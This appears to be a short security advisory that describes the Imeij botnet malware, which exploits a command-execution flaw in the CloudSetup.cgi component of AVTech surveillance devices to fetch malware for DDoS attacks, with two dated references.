Imeij targets devices running Linux OS and specifically exploits a vulnerability present in AVTech video surveillance equipment. This vulnerability impacts devices that support AVTech’s cloud service that contains the Common Gateway Interface (CGI) component, CloudSetup.cgi. This component can be used by attackers to execute malicious commands. Specifically, Imeij is using this vulnerability to manipulate the devices into downloading malware in order to conduct DDoS attacks. As of the date of this post, AVTech has not responded to disclosure reports regarding this vulnerability.

Reporting and Technical Details

  • October 2016: AVtech Devices Multiple Vulnerabilities (Search-Lab)
  • March 2017: Imeij Botnet Malware Targets IoT Cameras (Silicon)